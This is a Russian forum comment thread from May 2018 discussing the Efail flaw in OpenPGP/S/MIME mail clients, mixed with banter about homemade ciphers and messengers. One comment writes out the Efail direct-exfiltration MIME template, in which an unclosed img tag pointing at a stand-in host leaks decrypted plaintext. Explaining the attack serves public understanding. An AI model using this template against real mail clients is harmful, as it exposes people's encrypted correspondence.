1.1, Онвоним (?), 11:03, 14/05/2018 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
Зачем альтернативные каналы и signal? Просто отключить автоматическую расшифровку, и делать это руками.
| |
|
2.5, Онанимус (?), 11:08, 14/05/2018 [^] [^^] [^^^] [ответить]
| +2 +/– |
Таки да! Тем более не понятна связь между автоматической расшифровкой и уязвимостью зашифровки.
| |
|
3.10, Онвоним (?), 11:34, 14/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
Я предполагаю, что уязвимость - это сохранение почтовым клиентом исходного незашифрованного сообщения перед отправкой в черновиках. Черновик в исходном виде может передаваться серверу. И если история переписки в черновиках хранятся на почтовом сервере - то можно восстанавливать оригиналы. Клиент может периодически сохранять черновик ещё не отправленного письма.
Наблюдал такое, но пока со связкой K-9 (с OpenKeychain). Но то Android.
Соответственно, шифруем сообщение, кладём armored-текст в письмо, и расшифровываем в обратном порядке при получении.
| |
|
4.31, Онанимус (?), 12:08, 14/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
> Я предполагаю, что уязвимость - это сохранение почтовым клиентом исходного незашифрованного сообщения перед отправкой в черновиках.
IMAP? Но в таком случае, уязвим трафик до IMAP сервера. Дальше то письмо идет шифрованное. А в анонсе говорится о глобальной уязвимости.
| |
|
|
|
1.2, лютый охохонюшка (?), 11:05, 14/05/2018 [ответить] [﹢﹢﹢] [ · · · ]
| –10 +/– |
А ведь неломаемое шифрование изобрели ещё при царе Горохе, одноразовые шифр-блокноты называется. В наши времена дешевого стораджа вообще халявка, сгенерил 4ГБ рэндома и хватит на всю жизнь + на аудиоразговоры.
| |
|
2.4, Кир (?), 11:07, 14/05/2018 [^] [^^] [^^^] [ответить]
| +3 +/– |
... и наградил всех счастливых потенциальных корреспондентов гигабайтами мусора ...
| |
2.105, angra (ok), 21:08, 14/05/2018 [^] [^^] [^^^] [ответить]
| +2 +/– |
И как тебе эти блокноты помогут в ситуации, когда уязвимость не в самом механизме методе шифрования или ключе, а в взаимодействии клиентского софта с этим механизмом? Или ты новость не читал?
| |
|
|
2.11, Andrey Mitrofanov (?), 11:36, 14/05/2018 [^] [^^] [^^^] [ответить]
| –2 +/– |
> Настало время создавать логотип, логотип сам себя не создаст.
Дыкыть анонса-то не было ещё. Это слухи-утечки, подогревающие интерес покупателей к. До 15-го заинтересованные микрософты подгонят ребятам денежек и на логотип, и на погоняло креатифное, и на титульный сайт в зоне .com (.cypher? .bug? .info? .app!?? -- где по-взрослому-то? чтоб подороже!).
Ща, погодь, всё будет.
+++!"простые ошибки в СПО" & "получают имена собственные, эмблемы и пр." http://www.opennet.me/openforum/vsluhforumID3/105391.html#15
| |
|
3.15, Andrey Mitrofanov (?), 11:40, 14/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
> и на погоняло креатифное,
" Проблемам присвоено имя Efail. "
Я прочитал наверху, да. //IMNSHO лучше б денег подождали -- чего покреативнее приду ^W купили б.
| |
3.18, Аноним (-), 11:43, 14/05/2018 [^] [^^] [^^^] [ответить]
| –1 +/– |
cTLD .apple ещё не занята ...
Эппл её хрен отсудит, так как можно сказать, что она для продавцов и культиваторов яблоневых саженцев, но зато они могут её заблочить в гейфонах.
| |
|
|
|
2.32, Andrey Mitrofanov (?), 12:08, 14/05/2018 [^] [^^] [^^^] [ответить]
| +1 +/– |
> https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060315.html
Акхр... "HTML mails" + "автоматическое [рас]шифровывание".
Расходимся, пацаны!
--- Сегодня в нашем сикьюритэ циркусе:
?Те, кто меняют безопасность на удобство, не получат ни того ни другого.?
?Удобная "безопасность" небезопасна. Неудобная тоже. Проверенная -- не факт. Проверенная лично -- безопасна, может быть. Проверенная лично, ежедневно и ${нужное-неизвестное вписать!} -- весьма вероятно, но недолго.?
| |
|
3.103, Аноним (-), 21:03, 14/05/2018 [^] [^^] [^^^] [ответить]
| –1 +/– |
>Use authenticated encryption.
Кто-то ещё юзает unauthenticated encryption?
| |
|
|
1.8, Онаним (?), 11:27, 14/05/2018 [ответить] [﹢﹢﹢] [ · · · ]
| –10 +/– |
В очередной раз убеждаюсь: хочешь сделать хорошо - сделай это сам. Систему шифрования для своего бизнеса - изучи вопрос, и пиши сам.
| |
|
2.9, sabakka (?), 11:32, 14/05/2018 [^] [^^] [^^^] [ответить]
| +17 +/– |
люди годами не могут сделать, онаним запилит все за пару недель.
| |
|
|
4.104, Аноним (-), 21:05, 14/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
> забыл авторство АНБ указать :)
Интересно служил ли Брюс Шнайер в АНБ?
| |
|
5.108, Аноним (-), 21:13, 14/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
> Интересно служил ли Брюс Шнайер в АНБ?
Вроде бы нет. Но как минимум пару своих же алгоритмов он более не рекомендует, а еще один советует в основном как основу алгоритма хэширования, а не крипто в чистом виде. Но он свои алгоритмы честно оценивает и знает наихучшие атаки, фигли.
| |
|
|
|
|
5.124, konst55512 (?), 01:31, 15/05/2018 [^] [^^] [^^^] [ответить]
| –1 +/– |
Есть фантазии.
Самый безопасный метод общения между мной и В.Пупкиным такой:
используй собственный вариант гав-но-шифровки, типа: tr/abc/cba/.
Это реально работающий метод. Не один бот не расшифрует.
А вот если всяким там ЦРУ/АНБ/ФСБ захочется мою переписку расшифровать, они не станут задействоать НИИ и проч., а используют безотказный паяльник. Дешевле и быстрее.
Именно поэтому не вижу смысла с создании супер-алгоритмов шифрования.
| |
|
6.125, arisu (ok), 01:44, 15/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
> типа: tr/abc/cba/.
> Это реально работающий метод. Не один бот не расшифрует.
лолушки. вот и Профессионалы Криптоанализа пожаловали. эти ваши гуаношифры как раз и ломаются *автоматически*. и нет, волшебные слова «я знаю про фестеля и сделал свой с-бокс!» тоже не спасут. всё ещё автоматически.
| |
|
7.127, konst55512 (?), 03:20, 15/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
>> типа: tr/abc/cba/.
>> Это реально работающий метод. Не один бот не расшифрует.
> лолушки. вот и Профессионалы Криптоанализа пожаловали. эти ваши гуаношифры как раз и
> ломаются *автоматически*. и нет, волшебные слова «я знаю про фестеля и
> сделал свой с-бокс!» тоже не спасут. всё ещё автоматически.
Вы категоррически не правы (imho).
Я говорил о том, что расшифровать tr/abc/bca/ способен только И ТОЛЬКО тот, кто этого очень хочет. А простые боты используют стандартные способы расшифровки (известные уязвимости).
А 2-е мое утверждение, которое не подлежит оспору, - это то, что если кому-то очень-очень захочется узнать, что же я написал Василию Пупкину сумеет сделать это гораздо менее затратно, чем догадавшись сделать tr/bca/abc/.
| |
|
8.128, arisu (ok), 10:27, 15/05/2018 [^] [^^] [^^^] [ответить] | +1 +/– | я не знаю, что такое 171 простые боты 187 , и какое они отношение имеют к шиф... текст свёрнут, показать | |
|
|
|
|
4.45, rshadow (ok), 13:10, 14/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
Итальянская забастовка: делать все _абсолютно в точности_ написанным правилам.
| |
4.66, Аноним (-), 15:07, 14/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
Именно поэтому правила криптографии появились уже после появления криптографии.
| |
|
3.34, Andrey Mitrofanov (?), 12:23, 14/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
> Первое правило криптографии - никогда не придумывай свою систему криптографии.
" If you think technology can solve your security problems, then you don't understand the problems and you don't understand the technology. " --Bruce Schneier
" Anyone, from the most clueless amateur to the best cryptographer, can create an algorithm that he himself can't break. " --Bruce Schneier
" The user's going to pick dancing pigs over security every time. " --Bruce Schneier
//https://duckduckgo.com/?q=Bruce+Schneier+cryptograpy+security+quotes&ia=web
| |
3.39, pkdr (ok), 12:48, 14/05/2018 [^] [^^] [^^^] [ответить]
| –1 +/– |
Если бы так думали все, то до сих пор бы шифровали решётками, как у Жюля Верна или человечками, как у Конан Дойла.
| |
3.48, unxed (?), 13:26, 14/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
А вот использовать индустриальный стандарт одновременно со своей криптографией это правило не запрещает. Или запрещает?
Больше бдительности! Недостаточно паранойи!
А вообще страшилки про дыры АНБ в алгоритмах как-то не сходятся с тем, что биткойны на тех же алгоритмах вполне надёжно крутятся, и никакие бывшие сотрудники АНБ на дырах не обогащаются. Или обогащаются, потихоньку списывая с кошельков, по которым годами не было транзакций? ;-)
| |
|
4.62, Аноним84701 (ok), 14:53, 14/05/2018 [^] [^^] [^^^] [ответить]
| –1 +/– |
> А вообще страшилки про дыры АНБ в алгоритмах как-то не сходятся с тем, что биткойны на тех же алгоритмах вполне надёжно крутятся, и никакие бывшие сотрудники АНБ на дырах не обогащаются.
Все верно, ведь все-все дыры во всех-всех алгоритмах (причем сразу со сплойтами и прочим) доступны каждому сотруднику, без подписи десятка бумажек и обещания ана^W различных кар в случае утечки …
| |
|
5.72, kk (??), 17:01, 14/05/2018 [^] [^^] [^^^] [ответить]
| +3 +/– |
анальные карты очень наверное страшны когда на кону тысячи биткоинов
ну что вы в самом деле
| |
|
6.74, Аноним84701 (ok), 17:13, 14/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
> анальные карты очень наверное страшны когда на кону тысячи биткоинов ну что вы в самом деле
Зато обосновывать отсутствие дыр в алгоритмах тем, что бывшие сотрудники АНБ не попались на уводе биткоинов совсем не "в самом деле"?
Если исходить из шпионских рома^W^W логики, то доступ к таким вещам всегда будет у довольно ограниченного количества людей. И в особо сильную текучку кадров и наличие кучи откровенных дураков там как-то не сильно верится.
В свою очередь, в этом случае эти бывшие сотрудники вполне себе осознают возможности родной конторы (и того, что вычисляются они, скорее всего, только влет). А там все равно биткоины отберут и в места не столь отдаленные отправят.
Ну или они просто не попадаются, да -- доказать это вы тоже не можете ;)
| |
6.113, Anonimous (?), 21:31, 14/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
> анальные карты очень наверное страшны когда на кону тысячи биткоинов
полагаю, что в спецслужбах как в мафии: "анальные карты" за серьезный проступок приводят к тому, что даже тело оступившегося будет невозможно найти. Т.е с "анала" кары только начнутся, а не закончатся. Вы сильно переоцениваете значение денег.
| |
|
|
|
|
2.65, Ан (??), 15:07, 14/05/2018 [^] [^^] [^^^] [ответить]
| +1 +/– |
Боюсь, на бизнесс времени не останется =) А если все и получится, то придут вежливые люди и попросят изменить алгоритм на гост и попутно отдать ключи
| |
|
1.14, Andrew (??), 11:37, 14/05/2018 [ответить] [﹢﹢﹢] [ · · · ]
| –7 +/– |
99% пользователей имеют очень отдаленное представление о механизмах безопасности электронной почты, тем более, что речь идет о шифровании всего сообщения, а не только прикрепленных файлов. если OpenPGP еще кто-то использует, то S/MIME вообще для многих неведома зверушка. так что оба стандарта могут быть кривыми и косыми, никого это не коснется. и вообще хороший повод задуматься о том, что электронная почта это ископаемое из 70-80х годов 20 века, которое давно не отвечает современным требованиям.
| |
|
|
|
4.25, Ivan_83 (ok), 11:56, 14/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
телеграм и сигнал пусть идут по дальше, такие проекты ущемляющие свободы пользователей и их приватность.
| |
|
5.28, Аноним (-), 11:57, 14/05/2018 [^] [^^] [^^^] [ответить]
| –10 +/– |
> телеграм и сигнал пусть идут по дальше, такие проекты ущемляющие свободы пользователей
> и их приватность.
Сигнал да, но телеграм борется за свободы пользователей и их приватность.
| |
|
|
7.38, Crazy Alex (ok), 12:47, 14/05/2018 [^] [^^] [^^^] [ответить]
| –1 +/– |
Насколько я понимаю, у них одно другому не мешает - но это пока противоречия нет. Ну и свободы и приватность - тоже разные вещи. Вон, Эппл довольно агрессивно защищает приватность (а перед ним блекберри долго держался) - но свободы там ни капли.
| |
|
8.46, rshadow (ok), 13:13, 14/05/2018 [^] [^^] [^^^] [ответить] | +1 +/– | Так себе утверждение Пиарили-то серетные чаты, которыми никто не пользуется А ... текст свёрнут, показать | |
|
|
10.50, unxed (?), 13:33, 14/05/2018 [^] [^^] [^^^] [ответить] | +/– | Наличие секретных чатов при доступности не секретных само по себе свидетельство ... текст свёрнут, показать | |
|
|
8.58, Ivan_83 (ok), 14:25, 14/05/2018 [^] [^^] [^^^] [ответить] | +2 +/– | Огрызок интенсивно пеарится, как и все американские сервисы Их цель - создать в... текст свёрнут, показать | |
|
|
6.57, Ivan_83 (ok), 14:22, 14/05/2018 [^] [^^] [^^^] [ответить]
| +3 +/– |
Любой централизованный месенгер никогда не даст никаких свобод, пользователь для владельцев таких систем всегда товар/ресурс, который используется для извлечения выгоды.
К владельцам таких систем всегда будут приходить люди с полномочиями и получать всё что им нужно.
Это неизбежно, это всё заложено сразу в систему, кто бы что там не декларировал.
Даже если месенгер типа е2е то он всегда знает кто с кем когда и сколько переписывался, это уже слишком много.
Борьба телеги - это сплошной пеар, они всегда так на халяву пеарились, с самого начала.
Если бы им реально было интересно свобода и приватность - они бы превратились в аналог токса, а пока они привязаны к мобиле и своим серверам - грош им цена.
| |
|
|
8.82, arisu (ok), 17:45, 14/05/2018 [^] [^^] [^^^] [ответить] | +/– | потому что не надо ничего такого делать для 171 простых людей 187 если чело... текст свёрнут, показать | |
|
|
10.86, arisu (ok), 18:09, 14/05/2018 [^] [^^] [^^^] [ответить] | +/– | для того, от чего 171 защищает 187 ssl 8212 он сильно переусложнён а мел... большой текст свёрнут, показать | |
|
11.92, Ordu (ok), 18:36, 14/05/2018 [^] [^^] [^^^] [ответить] | +1 +/– | Естественно Я бы тоже так сказал А вот тут ты не прав Я делал так, и продолжа... большой текст свёрнут, показать | |
|
|
13.117, Ordu (ok), 22:19, 14/05/2018 [^] [^^] [^^^] [ответить] | +/– | Да какая мне разница, куда он там зрил, если он от увиденного зрелища регрессиро... текст свёрнут, показать | |
|
|
13.118, Ordu (ok), 22:22, 14/05/2018 [^] [^^] [^^^] [ответить] | +/– | И чё Я и без хомячьих подсказок знаю, собственно, и не скрываю Ну, не кричу на... текст свёрнут, показать | |
|
|
15.121, Ordu (ok), 00:44, 15/05/2018 [^] [^^] [^^^] [ответить] | +/– | Так это не я говорю -- это Фройд говорил Ты можешь заглянуть в википедию и убед... текст свёрнут, показать | |
|
|
|
|
|
|
|
8.94, Ivan_83 (ok), 19:31, 14/05/2018 [^] [^^] [^^^] [ответить] | +1 +/– | Нет промежуточной позиции Поскольку оно привязано к мобиле - того кого надо быс... текст свёрнут, показать | |
|
|
|
5.29, Аноним (-), 11:58, 14/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
> телеграм и сигнал пусть идут по дальше, такие проекты ущемляющие свободы пользователей
> и их приватность.
как будто днс, который использует емейлом, не является таковым. Только почтовые голуби с одноразовыми блокнотами спасут отца Русской Приватности.
| |
|
|
|
4.43, Аноним (-), 12:56, 14/05/2018 [^] [^^] [^^^] [ответить]
| +1 +/– |
Кто бы объяснил: на фига телеграм привязан к телефонному номеру?
| |
|
|
|
|
8.90, Ordu (ok), 18:20, 14/05/2018 [^] [^^] [^^^] [ответить] | +/– | Да Я могу создать сколько угодно почтовых ящиков И очень часто создаю под новы... текст свёрнут, показать | |
|
|
8.78, arisu (ok), 17:36, 14/05/2018 [^] [^^] [^^^] [ответить] | +/– | а ты, конечно, чтобы написать этот комментарий, был просто вынужден ввести свой ... текст свёрнут, показать | |
|
|
|
5.111, Михрютка (ok), 21:22, 14/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
> Кто бы объяснил: на фига телеграм привязан к телефонному номеру?
коллега, если вы приучите простого пользователя, испорченного смартфонами, заносить в телефонную книгу не номер телефона, а vasiapupkin@gde-to-tam, вы испытаете просветление и станете стивджобсом.
посчитайте, сколько у вас процентов в телефонной книге контактов, у которых не указан телефон, но указан какой-то другой идентификатор. обдумайте полученный результат.
я молчу о том, что signal, например, изначально был сделан для шифрования sms. тут без номера телефона вообще тяжело.
| |
|
6.126, Аноним (-), 02:11, 15/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
Кому нравится - пусть при регистрации указывает телефонный номер, но зачем же это навязывать?
| |
6.134, Аноним (-), 03:23, 16/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
> тут без номера телефона вообще тяжело.
Телефонный номер в смс - весьма абстрактная штука. Если так посмотреть что в нем написано в входящих смс - ну ты понял. Кто угодно может так же. Просто не все об этом задумываются.
Представляешь, любой желающий может на самом деле обложить с якобы твоего номера кого угодно трехэтажным матом, например. Несколько менее примитивные варианты провернутые на 1 апреля заставляют корчиться под столом немало гиков - все ограничено только фантазией, большинство хомяков думают как ты и ведутся на раз.
| |
|
|
4.59, Ivan_83 (ok), 14:28, 14/05/2018 [^] [^^] [^^^] [ответить]
| +1 +/– |
ггг как вам мозги то промыли.
Телега от аськи и мыло агента отличается только в худьшую сторону, ибо аська с агентом изначально мобилу не требовали и их можно было юзать не имея/не светя свой номер.
| |
|
3.26, 1 (??), 11:56, 14/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
хипстерский телеграмчик.
А по делу. Почта на бумаге - это 19 век (если не раньше) но всё как-то не избавиться.
| |
|
|
1.19, Нанобот (ok), 11:52, 14/05/2018 [ответить] [﹢﹢﹢] [ · · · ]
| –1 +/– |
>среди исследователей, которые входят в команду, выявившую уязвимость, в основном представлены эксперты, специализирующиеся на криптографических алгоритмах
не беда, сейчас эксперты опеннета разберут все остальные малоизученные области и выдадут своё экспертное заключение 😂
| |
|
2.35, Andrey Mitrofanov (?), 12:32, 14/05/2018 [^] [^^] [^^^] [ответить]
| +1 +/– |
>>среди исследователей, которые входят в команду, выявившую уязвимость, в основном представлены эксперты, специализирующиеся на криптографических алгоритмах
> не беда, сейчас эксперты опеннета разберут все остальные малоизученные области и выдадут
> своё экспертное заключение 😂
Особенно глубока и хорошо проработана экспертиза заключений эксертов по экспертизе областей опенета в области экспертизы. О да, коллега, безусловно!
Но надо идти глубже++ //https://duckduckgo.com/?q=need+to+go+deeper&t=ffnt&iax=images&ia=images
| |
|
|
2.44, Ordu (ok), 13:01, 14/05/2018 [^] [^^] [^^^] [ответить]
| +1 +/– |
О том, что у тебя есть время до завтра подумать и хоть как-то среагировать на грядущее раскрытие уязвимости.
| |
|
3.53, Andrey Mitrofanov (?), 13:52, 14/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
> О том, что у тебя есть время до завтра подумать и хоть
> как-то среагировать на грядущее раскрытие уязвимости.
Все писатели шифрованных HTML-писем соберут чемоданы, бросят квартиру(-ы), машины, дачи, яхты и... успеют улететь у Дурову во ...Вьетнам? ...Амстердам? ...Лондон или куда-там???
А нет ли тут ушей главного борца с коррупцией в э ^W одной стране!?
...или я слегка переоцениваю угрозы от нашей прокуратуры....
| |
|
4.89, Ordu (ok), 18:16, 14/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
> Все писатели шифрованных HTML-писем соберут чемоданы, бросят квартиру(-ы), машины, дачи, яхты и... успеют улететь у Дурову во ...Вьетнам? ...Амстердам? ...Лондон или куда-там???
Нет, там же написано, что судя по всему будет достаточно срочно сменить email-клиент на что-нибудь, что не умеет в html, отображая его текстом.
| |
|
|
|
|
2.93, Аноним (-), 19:31, 14/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
тоже самое что и у протона, вроде - опенпгп на жс. Учитывая что закрытые ключи этих сервисов юзверю не доступны - я бы не считал их чем то сесурным
| |
|
1.54, Аноним (-), 13:54, 14/05/2018 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
> Судя по всему, проблема связана с тем, что HTML может использоваться как канал для подстановки в письма заранее известных меток (oracle), например, через манипуляции с тегом "img".
Интересно как это отразиться на каком-нибудь Mutt.
| |
|
2.69, alex53 (ok), 16:37, 14/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
На mutt сам по себе - никак. Проблемы будут только если для написания писем будет использоваться html редактор.
| |
|
3.119, КО (?), 23:21, 14/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
И даже в этом случае в нормальном клиенте не страшно - ибо его html по умолчанию он в инет не выходит.
| |
|
|
1.70, Аноним (70), 16:38, 14/05/2018 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
Ну дык дырявые клиенты, дырявый HTML, а не сами GPG и GPG4win. Ручками вставлять и проверять, ручками. Развели тут панику.
| |
|
2.77, Аноним (-), 17:35, 14/05/2018 [^] [^^] [^^^] [ответить]
| –2 +/– |
Думаешь в самом GPG нет дыр? Верить в идеальность софта в 2018?
| |
|
1.95, Аноним (-), 19:32, 14/05/2018 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
>только писем, переданных в формате HTML
пересылать конфиденциальную инфу в хтмл - ссзб
| |
|
2.97, Аноним84701 (ok), 20:23, 14/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
>>только писем, переданных в формате HTML
> пересылать конфиденциальную инфу в хтмл - ссзб
Не пересылать в HTML не поможет. Поможет не расшифровывать или же не рендерить (альтернативно: не допускать при этом никаких внешних запросов).
См. вполне доходчивый пример:
https://efail.de/ (Direct Exfiltration)
Кстати, как и ожидалось - Claws и Мutt (ну и еще несколько менее удобных, второстепенных клиентов) уязвимости не подвержены :)
| |
|
3.98, arisu (ok), 20:29, 14/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
поможет чудесный маленький фильтр, который html-мусор выкидывает. вместе со всем письмом.
| |
|
4.100, Аноним (-), 20:41, 14/05/2018 [^] [^^] [^^^] [ответить]
| +1 +/– |
> поможет чудесный маленький фильтр, который html-мусор выкидывает. вместе со всем письмом.
Интересно, а в случае HTML не прокатит внаглую скриптом читать содержимое хтмылки и скидывать его в ремотный канал? Так, глядя на это безобразие.
//в общем хорошо что я предпочитаю plain text и когтемыл...
| |
|
5.101, arisu (ok), 20:55, 14/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
> Интересно, а в случае HTML не прокатит внаглую скриптом читать содержимое хтмылки
> и скидывать его в ремотный канал? Так, глядя на это безобразие.
зависит от криворукости авторов клиентов. в принципе, все нормальные клиенты должны запрещать такие шутки… но с другой стороны: нормальные люди не пишут клиентов с поддержкой html в письмах.
| |
5.107, Аноним84701 (ok), 21:10, 14/05/2018 [^] [^^] [^^^] [ответить]
| +/– |
> Интересно, а в случае HTML не прокатит внаглую скриптом читать содержимое хтмылки
> и скидывать его в ремотный канал? Так, глядя на это безобразие.
А смысл?
Принципиально расшифровка и leak делаются вот так:
[CODE]
Content-Type: text/html
<img src="https://foo.bar/
--BOUNDARY--
Content-Type: application/pksc7-mime:
Foo:bar
ENCRYPTED MSG // сюда можно подставить любое содержимое, т.е. из тех же текствоых писем
--BOUNDARY--
Content-Type: text/html
">
--BOUNDARY--
[/CODE]
т.е. все достаточно просто.
А JS все же обычно по умолчанию режется/отключен (вроде бы thunderbird с версии 3, аутлук, гмейл), из-за спама и прочих "радостей".
| |
|
|
|
|
1.99, Аноним (-), 20:37, 14/05/2018 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
> проблема касается только писем, переданных в формате HTML,
А, ну это еще не так страшно.
| |
|